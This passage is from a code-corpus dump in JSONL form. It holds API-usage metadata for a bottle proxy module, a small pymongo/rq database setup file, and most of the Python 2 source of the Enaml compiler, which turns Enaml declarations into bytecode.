"usage_type": "name"}, {"api_name": "el_aap.app.app.put", "line_number": 24, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 24, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 24, "usage_type": "name"}, {"api_name": "el_aap.app.app.put", "line_number": 25, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 25, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 25, "usage_type": "name"}, {"api_name": "el_aap.app.app.put", "line_number": 26, "usage_type": "call"}, {"api_name": "el_aap.app.str_index", "line_number": 26, "usage_type": "argument"}, {"api_name": "el_aap.app.app", "line_number": 26, "usage_type": "name"}, {"api_name": "el_aap.app.app.put", "line_number": 27, "usage_type": "call"}, {"api_name": "el_aap.app.app", 
"line_number": 27, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 27, "usage_type": "name"}, {"api_name": "el_aap.app.app.put", "line_number": 28, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 28, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 28, "usage_type": "name"}, {"api_name": "el_aap.app.app.put", "line_number": 29, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 29, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 29, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 49, "usage_type": "call"}, {"api_name": "el_aap.app.endpoint.endpoint", "line_number": 50, "usage_type": "attribute"}, {"api_name": "el_aap.app.endpoint", "line_number": 50, "usage_type": "name"}, {"api_name": "bottle.request.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 50, "usage_type": "name"}, {"api_name": "bottle.request.query", "line_number": 51, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 51, "usage_type": "name"}, {"api_name": "bottle.request.body", "line_number": 52, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 52, "usage_type": "name"}, {"api_name": "el_aap.app.app.post", "line_number": 42, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 42, "usage_type": "name"}, {"api_name": "el_aap.app.app.post", "line_number": 43, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 43, "usage_type": "name"}, {"api_name": "el_aap.app.app.post", "line_number": 44, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 44, "usage_type": "name"}, {"api_name": "el_aap.app.app.post", "line_number": 45, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 45, "usage_type": "name"}, {"api_name": "el_aap.app.app.post", "line_number": 46, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 46, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 71, "usage_type": "call"}, {"api_name": "el_aap.app.endpoint.endpoint", "line_number": 72, "usage_type": "attribute"}, {"api_name": "el_aap.app.endpoint", "line_number": 72, "usage_type": "name"}, {"api_name": "bottle.request.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 72, "usage_type": "name"}, {"api_name": "bottle.request.query", "line_number": 73, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 73, "usage_type": "name"}, {"api_name": "bottle.request.body", "line_number": 74, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 74, "usage_type": "name"}, {"api_name": "el_aap.app.app.post", "line_number": 59, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 59, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 59, "usage_type": "name"}, {"api_name": "el_aap.app.app.post", "line_number": 60, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 60, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 60, "usage_type": "name"}, {"api_name": "el_aap.app.app.post", "line_number": 61, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 61, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 61, "usage_type": "name"}, {"api_name": "el_aap.app.app.post", "line_number": 62, "usage_type": "call"}, {"api_name": "el_aap.app.app", 
"line_number": 62, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 62, "usage_type": "name"}, {"api_name": "el_aap.app.app.post", "line_number": 63, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 63, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 63, "usage_type": "name"}, {"api_name": "el_aap.app.app.post", "line_number": 64, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 64, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 64, "usage_type": "name"}, {"api_name": "el_aap.app.app.post", "line_number": 65, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 65, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 65, "usage_type": "name"}, {"api_name": "el_aap.app.app.post", "line_number": 66, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 66, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 66, "usage_type": "name"}, {"api_name": "el_aap.app.app.post", "line_number": 67, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 67, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 67, "usage_type": "name"}, {"api_name": "el_aap.app.app.post", "line_number": 68, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 68, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 68, "usage_type": "name"}, {"api_name": "requests.delete", "line_number": 86, "usage_type": "call"}, {"api_name": "el_aap.app.endpoint.endpoint", "line_number": 87, "usage_type": "attribute"}, {"api_name": "el_aap.app.endpoint", "line_number": 87, "usage_type": "name"}, {"api_name": "bottle.request.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 87, "usage_type": "name"}, {"api_name": "bottle.request.query", "line_number": 88, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 88, "usage_type": "name"}, {"api_name": "bottle.request.body", "line_number": 89, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 89, "usage_type": "name"}, {"api_name": "el_aap.app.app.delete", "line_number": 81, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 81, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 81, "usage_type": "name"}, {"api_name": "el_aap.app.app.delete", "line_number": 82, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 82, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 82, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 110, "usage_type": "call"}, {"api_name": "el_aap.app.endpoint.endpoint", "line_number": 111, "usage_type": "attribute"}, {"api_name": "el_aap.app.endpoint", "line_number": 111, "usage_type": "name"}, {"api_name": "bottle.request.path", "line_number": 111, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 111, "usage_type": "name"}, {"api_name": "bottle.request.query", "line_number": 112, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 112, "usage_type": "name"}, {"api_name": "bottle.request.body", "line_number": 113, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 113, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 96, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 96, "usage_type": "name"}, 
{"api_name": "el_aap.app.app.get", "line_number": 97, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 97, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 98, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 98, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 99, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 99, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 100, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 100, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 101, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 101, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 102, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 102, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 103, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 103, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 104, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 104, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 105, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 105, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 106, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 106, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 107, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 107, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 138, "usage_type": "call"}, {"api_name": "el_aap.app.endpoint.endpoint", "line_number": 139, "usage_type": "attribute"}, {"api_name": "el_aap.app.endpoint", "line_number": 139, "usage_type": "name"}, {"api_name": "bottle.request.path", "line_number": 139, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 139, "usage_type": "name"}, {"api_name": "bottle.request.query", "line_number": 140, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 140, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 120, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 120, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 120, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 121, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 121, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 121, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 122, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 122, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 122, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 123, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 123, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 123, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 124, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 124, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 124, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 125, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 125, "usage_type": "name"}, {"api_name": 
"el_aap.app.str_index", "line_number": 125, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 126, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 126, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 126, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 127, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 127, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 127, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 128, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 128, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 128, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 129, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 129, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 129, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 130, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 130, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 130, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 131, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 131, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 131, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 132, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 132, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 132, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 133, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 133, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 133, "usage_type": "name"}, {"api_name": "el_aap.app.app.get", "line_number": 134, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 134, "usage_type": "name"}, {"api_name": "el_aap.app.str_index", "line_number": 134, "usage_type": "name"}]} +{"seq_id": "609232326", "text": "from pymongo import Connection\nfrom rq import Queue, use_connection\n\nconnection = Connection('localhost', 27017) # Use defaults\ndb = connection.test_db\ndocument_db = db.messages\n\n# Redis connection for creating worker processes\nuse_connection()\nworker_queue = Queue()\n", "sub_path": "database.py", "file_name": "database.py", "file_ext": "py", "file_size_in_byte": 268, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pymongo.Connection", "line_number": 4, "usage_type": "call"}, {"api_name": "rq.use_connection", "line_number": 9, "usage_type": "call"}, {"api_name": "rq.Queue", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "567135451", "text": "#------------------------------------------------------------------------------\n# Copyright (c) 2011, Enthought, Inc.\n# All rights reserved.\n#------------------------------------------------------------------------------\nimport ast\nimport itertools\nimport types\n\nfrom .byteplay import (\n Code, LOAD_FAST, CALL_FUNCTION, LOAD_GLOBAL, STORE_FAST, LOAD_CONST,\n LOAD_ATTR, STORE_SUBSCR, RETURN_VALUE, POP_TOP, MAKE_FUNCTION, STORE_NAME,\n LOAD_NAME, DUP_TOP, SetLineno, BINARY_SUBSCR, STORE_ATTR, ROT_TWO,\n DELETE_NAME, DELETE_FAST\n)\nfrom .code_tracing import inject_tracing, inject_inversion\n\n\n# Increment 
this number whenever the compiler changes the code which it\n# generates. This number is used by the import hooks to know which version\n# of a .enamlc file is valid for the Enaml compiler version in use. If\n# this number is not incremented on change, it may result in .enamlc\n# files which fail on import.\n#\n# Version History\n# ---------------\n# 1 : Initial compiler version - 2 February 2012\n# 2 : Update line number handling - 26 March 2012\n# When compiling code objects with mode='eval', Python ignores the\n# line number specified by the ast. The workaround is to compile the\n# code object, then make a new copy of it with the proper firstlineno\n# set via the types.CodeType constructor.\n# 3 : Update the generated code to remove the toolkit - 21 June 2012\n# This updates the compiler for the coming switch to async UI's\n# which will see the removal of the Toolkit concept. The only\n# magic scope maintained is for that of operators.\n# 4 : Update component building - 27 July 2012\n# This updates the compiler to handle the new Enaml creation semantics\n# that don't rely on __enaml_call__. Instead the parent is passed\n# directly to the component cls which is a subclass of Declarative.\n# That class handles calling the builder functions upon instance\n# creation. This allows us to get rid of the EnamlDef class and\n# make enamldef constructs proper subclasses of Declarative.\n# 5 : Change the import names - 28 July 2012\n# This changes the imported helper name from _make_decl_subclass_\n# to _make_enamldef_helper_ which is more descriptive, but equally\n# mangled. It also updates the method name used on the Declarative\n# component for adding attribute from _add_decl_attr to the more\n# descriptive _add_user_attribute. Finally, it adds the eval_compile\n# function for compiling Python code in 'eval' mode with proper line\n# number handling.\n# 6 : Compile with code tracing - 24 November 2012\n# This updates the compiler to generate code using the idea of code\n# tracing instead of monitors and inverters. The compiler compiles\n# the expressions into functions which are augmented to accept\n# additional arguments. These arguments are tracer objects which will\n# have methods called in response to bytecode ops executing. These\n# methods can then attach listeners as necessary. This is an easier\n# paradigm to develop with than the previous incarnation. This new\n# way also allows the compiler to generate the final code objects\n# upfront, instead of needed to specialize at runtime for a given\n# operator context. 
This results in a much smaller footprint since\n# then number of code objects created is n instead of n x m.\n# 7 : Fix bug with local deletes - 10 December 2012\n# This fixes a bug in the locals optimization where the DELETE_NAME\n# opcode was not being replaced with DELETE_FAST.\nCOMPILER_VERSION = 7\n\n\n# The Enaml compiler translates an Enaml AST into Python bytecode.\n#\n# Given this sample declaration in Enaml::\n#\n# FooWindow(Window):\n# id: foo\n# a = '12'\n# PushButton:\n# id: btn\n# text = 'clickme'\n#\n# The compiler generate bytecode that would corresponds to the following\n# Python code (though the function object is never assigned to a name in\n# the global namespace).\n#\n# def FooWindow(instance, identifiers, operators):\n# f_globals = globals()\n# _var_1 = instance\n# identifiers['foo'] = _var_1\n# op = operators['__operator_Equal__']\n# op(_var_1, 'a', , identifiers)\n# _var_2 = f_globals['PushButton'](_var_1)\n# identifiers['btn'] = _var_2\n# op = operators['__operator_Equal__']\n# op(_var_2, 'text', , identifiers)\n# return _var_1\n#\n# FooWindow = _make_enamldef_helper_('FooWindow', Window, FooWindow)\n\n\n#------------------------------------------------------------------------------\n# Compiler Helpers\n#------------------------------------------------------------------------------\n# Code that will be executed at the top of every enaml module\nSTARTUP = ['from enaml.core.compiler_helpers import _make_enamldef_helper_']\n\n\n# Cleanup code that will be included in every compiled enaml module\nCLEANUP = ['del _make_enamldef_helper_']\n\n\ndef _var_name_generator():\n \"\"\" Returns a generator that generates sequential variable names for\n use in a code block.\n\n \"\"\"\n count = itertools.count()\n while True:\n yield '_var_' + str(count.next())\n\n\ndef update_firstlineno(code, firstlineno):\n \"\"\" Returns a new code object with an updated first line number.\n\n \"\"\"\n return types.CodeType(\n code.co_argcount, code.co_nlocals, code.co_stacksize, code.co_flags,\n code.co_code, code.co_consts, code.co_names, code.co_varnames,\n code.co_filename, code.co_name, firstlineno, code.co_lnotab,\n code.co_freevars, code.co_cellvars,\n )\n\n\n#------------------------------------------------------------------------------\n# Expression Compilers\n#------------------------------------------------------------------------------\ndef replace_global_loads(codelist, explicit=None):\n \"\"\" A code transformer which rewrites LOAD_GLOBAL opcodes.\n\n This transform will replace the LOAD_GLOBAL opcodes with LOAD_NAME\n opcodes. The operation is performed in-place.\n\n Parameters\n ----------\n codelist : list\n The list of byteplay code ops to modify.\n\n explicit : set or None\n The set of global names declared explicitly and which should\n remain untransformed.\n\n \"\"\"\n # Replacing LOAD_GLOBAL with LOAD_NAME enables dynamic scoping by\n # way of a custom locals mapping. The `call_func` function in the\n # `funchelper` module enables passing a locals map to a function.\n explicit = explicit or set()\n for idx, (op, op_arg) in enumerate(codelist):\n if op == LOAD_GLOBAL and op_arg not in explicit:\n codelist[idx] = (LOAD_NAME, op_arg)\n\n\ndef optimize_locals(codelist):\n \"\"\" Optimize the given code object for fast locals access.\n\n All STORE_NAME opcodes will be replaced with STORE_FAST. Names which\n are stored and then loaded via LOAD_NAME are rewritten to LOAD_FAST\n and DELETE_NAME is rewritten to DELETE_FAST. 
This transformation is\n applied in-place.\n\n Parameters\n ----------\n codelist : list\n The list of byteplay code ops to modify.\n\n \"\"\"\n fast_locals = set()\n for idx, (op, op_arg) in enumerate(codelist):\n if op == STORE_NAME:\n fast_locals.add(op_arg)\n codelist[idx] = (STORE_FAST, op_arg)\n for idx, (op, op_arg) in enumerate(codelist):\n if op == LOAD_NAME and op_arg in fast_locals:\n codelist[idx] = (LOAD_FAST, op_arg)\n elif op == DELETE_NAME and op_arg in fast_locals:\n codelist[idx] = (DELETE_FAST, op_arg)\n\n\ndef compile_simple(py_ast, filename):\n \"\"\" Compile an ast into a code object implementing operator `=`.\n\n Parameters\n ----------\n py_ast : ast.Expression\n A Python ast Expression node.\n\n filename : str\n The filename which generated the expression.\n\n Returns\n -------\n result : types.CodeType\n A Python code object which implements the desired behavior.\n\n \"\"\"\n code = compile(py_ast, filename, mode='eval')\n code = update_firstlineno(code, py_ast.lineno)\n bp_code = Code.from_code(code)\n replace_global_loads(bp_code.code)\n optimize_locals(bp_code.code)\n bp_code.newlocals = False\n return bp_code.to_code()\n\n\ndef compile_notify(py_ast, filename):\n \"\"\" Compile an ast into a code object implementing operator `::`.\n\n Parameters\n ----------\n py_ast : ast.Module\n A Python ast Module node.\n\n filename : str\n The filename which generated the expression.\n\n Returns\n -------\n result : types.CodeType\n A Python code object which implements the desired behavior.\n\n \"\"\"\n explicit_globals = set()\n for node in ast.walk(py_ast):\n if isinstance(node, ast.Global):\n explicit_globals.update(node.names)\n code = compile(py_ast, filename, mode='exec')\n bp_code = Code.from_code(code)\n replace_global_loads(bp_code.code, explicit_globals)\n optimize_locals(bp_code.code)\n bp_code.newlocals = False\n return bp_code.to_code()\n\n\ndef compile_subscribe(py_ast, filename):\n \"\"\" Compile an ast into a code object implementing operator `<<`.\n\n Parameters\n ----------\n py_ast : ast.Expression\n A Python ast Expression node.\n\n filename : str\n The filename which generated the expression.\n\n Returns\n -------\n result : types.CodeType\n A Python code object which implements the desired behavior.\n\n \"\"\"\n code = compile(py_ast, filename, mode='eval')\n code = update_firstlineno(code, py_ast.lineno)\n bp_code = Code.from_code(code)\n replace_global_loads(bp_code.code)\n optimize_locals(bp_code.code)\n bp_code.code = inject_tracing(bp_code.code)\n bp_code.newlocals = False\n bp_code.args = ('_[tracer]',) + bp_code.args\n return bp_code.to_code()\n\n\ndef compile_update(py_ast, filename):\n \"\"\" Compile an ast into a code object implementing operator `>>`.\n\n Parameters\n ----------\n py_ast : ast.Expression\n A Python ast Expression node.\n\n filename : str\n The filename which generated the expression.\n\n Returns\n -------\n result : types.CodeType\n A Python code object which implements the desired behavior.\n\n \"\"\"\n code = compile(py_ast, filename, mode='eval')\n code = update_firstlineno(code, py_ast.lineno)\n bp_code = Code.from_code(code)\n replace_global_loads(bp_code.code)\n optimize_locals(bp_code.code)\n bp_code.code = inject_inversion(bp_code.code)\n bp_code.newlocals = False\n bp_code.args = ('_[inverter]', '_[value]') + bp_code.args\n return bp_code.to_code()\n\n\ndef compile_delegate(py_ast, filename):\n \"\"\" Compile an ast into a code object implementing operator `:=`.\n\n This will generate two code objects: one which 
is equivalent to\n operator `<<` and another which is equivalent to `>>`.\n\n Parameters\n ----------\n py_ast : ast.Expression\n A Python ast Expression node.\n\n filename : str\n The filename which generated the expression.\n\n Returns\n -------\n result : tuple\n A 2-tuple of types.CodeType equivalent to operators `<<` and\n `>>` respectively.\n\n \"\"\"\n code = compile(py_ast, filename, mode='eval')\n code = update_firstlineno(code, py_ast.lineno)\n bp_code = Code.from_code(code)\n bp_code.newlocals = False\n codelist = bp_code.code[:]\n bp_args = tuple(bp_code.args)\n replace_global_loads(codelist)\n optimize_locals(codelist)\n sub_list = inject_tracing(codelist)\n bp_code.code = sub_list\n bp_code.args = ('_[tracer]',) + bp_args\n sub_code = bp_code.to_code()\n upd_list = inject_inversion(codelist)\n bp_code.code = upd_list\n bp_code.args = ('_[inverter]', '_[value]') + bp_args\n upd_code = bp_code.to_code()\n return (sub_code, upd_code)\n\n\nCOMPILE_OP_MAP = {\n '__operator_Equal__': compile_simple,\n '__operator_ColonColon__': compile_notify,\n '__operator_LessLess__': compile_subscribe,\n '__operator_GreaterGreater__': compile_update,\n '__operator_ColonEqual__': compile_delegate,\n}\n\n\n#------------------------------------------------------------------------------\n# Node Visitor\n#------------------------------------------------------------------------------\nclass _NodeVisitor(object):\n \"\"\" A node visitor class that is used as base class for the various\n Enaml compilers.\n\n \"\"\"\n def visit(self, node):\n \"\"\" The main visitor dispatch method.\n\n Unhandled nodes will raise an error.\n\n \"\"\"\n name = 'visit_%s' % node.__class__.__name__\n try:\n method = getattr(self, name)\n except AttributeError:\n method = self.default_visit\n method(node)\n\n def visit_nonstrict(self, node):\n \"\"\" A nonstrict visitor dispatch method.\n\n Unhandled nodes will be ignored.\n\n \"\"\"\n name = 'visit_%s' % node.__class__.__name__\n try:\n method = getattr(self, name)\n except AttributeError:\n pass\n else:\n method(node)\n\n def default_visit(self, node):\n \"\"\" The default visitor method. Raises an error since there\n should not be any unhandled nodes.\n\n \"\"\"\n raise ValueError('Unhandled Node %s.' 
% node)\n\n\n#------------------------------------------------------------------------------\n# Declaration Compiler\n#------------------------------------------------------------------------------\nclass DeclarationCompiler(_NodeVisitor):\n \"\"\" A visitor which compiles a Declaration node into a code object.\n\n \"\"\"\n @classmethod\n def compile(cls, node, filename):\n \"\"\" The main entry point of the DeclarationCompiler.\n\n This compiler compiles the given Declaration node into a code\n object for a builder function.\n\n Parameters\n ----------\n node : Declaration\n The Declaration node to compiler.\n\n filename : str\n The string filename to use for the generated code objects.\n\n \"\"\"\n compiler = cls(filename)\n compiler.visit(node)\n code_ops = compiler.code_ops\n code = Code(\n code_ops, [], ['instance', 'identifiers', 'operators'], False,\n False, True, node.name, filename, node.lineno, node.doc,\n )\n return code\n\n def __init__(self, filename):\n \"\"\" Initialize a DeclarationCompiler.\n\n Parameters\n ----------\n filename : str\n The filename string to use for the generated code object.\n\n \"\"\"\n self.filename = filename\n self.code_ops = []\n self.extend_ops = self.code_ops.extend\n self.name_gen = _var_name_generator()\n self.name_stack = []\n self.push_name = self.name_stack.append\n self.pop_name = self.name_stack.pop\n\n def curr_name(self):\n \"\"\" Returns the current variable name on the stack.\n\n \"\"\"\n return self.name_stack[-1]\n\n def visit_Declaration(self, node):\n \"\"\" Creates the bytecode ops for a declaration node.\n\n This node visitor pulls the passed in root into a local var\n and stores it's identifier if one is given. It also loads\n in the commonly used local variables `f_globals`, and `eval_`.\n\n \"\"\"\n name = self.name_gen.next()\n extend_ops = self.extend_ops\n self.push_name(name)\n\n extend_ops([\n (LOAD_NAME, 'globals'), # f_globals = globals()\n (CALL_FUNCTION, 0x0000),\n (STORE_FAST, 'f_globals'),\n (LOAD_FAST, 'instance'), # _var_1 = instance\n (STORE_FAST, name),\n ])\n\n if node.identifier:\n extend_ops([\n (LOAD_FAST, name), # identifiers['foo'] = _var_1\n (LOAD_FAST, 'identifiers'),\n (LOAD_CONST, node.identifier),\n (STORE_SUBSCR, None),\n ])\n\n visit = self.visit\n for item in node.body:\n visit(item)\n\n extend_ops([\n (LOAD_FAST, name), # return _var_1\n (RETURN_VALUE, None),\n ])\n\n self.pop_name()\n\n def visit_AttributeDeclaration(self, node):\n \"\"\" Creates the bytecode ops for an attribute declaration.\n\n The attributes will have already been added to the subclass, so\n this visitor just dispatches to any default bindings which may\n exist on the attribute declaration, since the binding happens\n at instantiation time via operators.\n\n \"\"\"\n default = node.default\n if default is not None:\n self.visit(node.default)\n\n def visit_AttributeBinding(self, node):\n \"\"\" Creates the bytecode ops for an attribute binding.\n\n This visitor handles loading and calling the appropriate\n operator.\n\n \"\"\"\n py_ast = node.binding.expr.py_ast\n op = node.binding.op\n op_compiler = COMPILE_OP_MAP[op]\n code = op_compiler(py_ast, self.filename)\n if isinstance(code, tuple): # operator `::`\n sub_code, upd_code = code\n self.extend_ops([\n (SetLineno, node.binding.lineno),\n (LOAD_FAST, 'operators'), # operators[op](obj, attr, sub_func, identifiers)\n (LOAD_CONST, op),\n (BINARY_SUBSCR, None),\n (LOAD_FAST, self.curr_name()),\n (LOAD_CONST, node.name),\n (LOAD_CONST, sub_code),\n (MAKE_FUNCTION, 0),\n (DUP_TOP, 
None),\n (LOAD_CONST, upd_code),\n (MAKE_FUNCTION, 0),\n (ROT_TWO, None),\n (STORE_ATTR, '_update'), # sub_func._update = upd_func\n (LOAD_FAST, 'identifiers'),\n (CALL_FUNCTION, 0x0004),\n (POP_TOP, None),\n ])\n else:\n self.extend_ops([\n (SetLineno, node.binding.lineno),\n (LOAD_FAST, 'operators'), # operators[op](obj, attr, func, identifiers)\n (LOAD_CONST, op),\n (BINARY_SUBSCR, None),\n (LOAD_FAST, self.curr_name()),\n (LOAD_CONST, node.name),\n (LOAD_CONST, code),\n (MAKE_FUNCTION, 0),\n (LOAD_FAST, 'identifiers'),\n (CALL_FUNCTION, 0x0004),\n (POP_TOP, None),\n ])\n\n def visit_Instantiation(self, node):\n \"\"\" Create the bytecode ops for a component instantiation.\n\n This visitor handles calling another derived component and\n storing its identifier, if given.\n\n \"\"\"\n extend_ops = self.extend_ops\n parent_name = self.curr_name()\n name = self.name_gen.next()\n self.push_name(name)\n extend_ops([\n (SetLineno, node.lineno),\n (LOAD_NAME, node.name), # _var_2 = globals()['PushButton'](parent)\n (LOAD_FAST, parent_name),\n (CALL_FUNCTION, 0x0001),\n (STORE_FAST, name),\n ])\n\n if node.identifier:\n extend_ops([\n (LOAD_FAST, name), # identifiers['btn'] = _var_2\n (LOAD_FAST, 'identifiers'),\n (LOAD_CONST, node.identifier),\n (STORE_SUBSCR, None),\n ])\n\n visit = self.visit\n for item in node.body:\n visit(item)\n\n self.pop_name()\n\n\n#------------------------------------------------------------------------------\n# Enaml Compiler\n#------------------------------------------------------------------------------\nclass EnamlCompiler(_NodeVisitor):\n \"\"\" A visitor that will compile an enaml module ast node.\n\n The entry point is the `compile` classmethod which will compile\n the ast into an appropriate python code object for a module.\n\n \"\"\"\n @classmethod\n def compile(cls, module_ast, filename):\n \"\"\" The main entry point of the compiler.\n\n Parameters\n ----------\n module_ast : Instance(enaml_ast.Module)\n The enaml module ast node that should be compiled.\n\n filename : str\n The string filename of the module ast being compiled.\n\n \"\"\"\n compiler = cls(filename)\n compiler.visit(module_ast)\n\n module_ops = [(SetLineno, 1)]\n extend_ops = module_ops.extend\n\n # Generate the startup code for the module\n for start in STARTUP:\n start_code = compile(start, filename, mode='exec')\n # Skip the SetLineo and ReturnValue codes\n extend_ops(Code.from_code(start_code).code[1:-2])\n\n # Add in the code ops for the module\n extend_ops(compiler.code_ops)\n\n # Generate the cleanup code for the module\n for end in CLEANUP:\n end_code = compile(end, filename, mode='exec')\n # Skip the SetLineo and ReturnValue codes\n extend_ops(Code.from_code(end_code).code[1:-2])\n\n # Add in the final return value ops\n extend_ops([\n (LOAD_CONST, None),\n (RETURN_VALUE, None),\n ])\n\n # Generate and return the module code object.\n mod_code = Code(\n module_ops, [], [], False, False, False, '', filename, 0, '',\n )\n return mod_code.to_code()\n\n def __init__(self, filename):\n 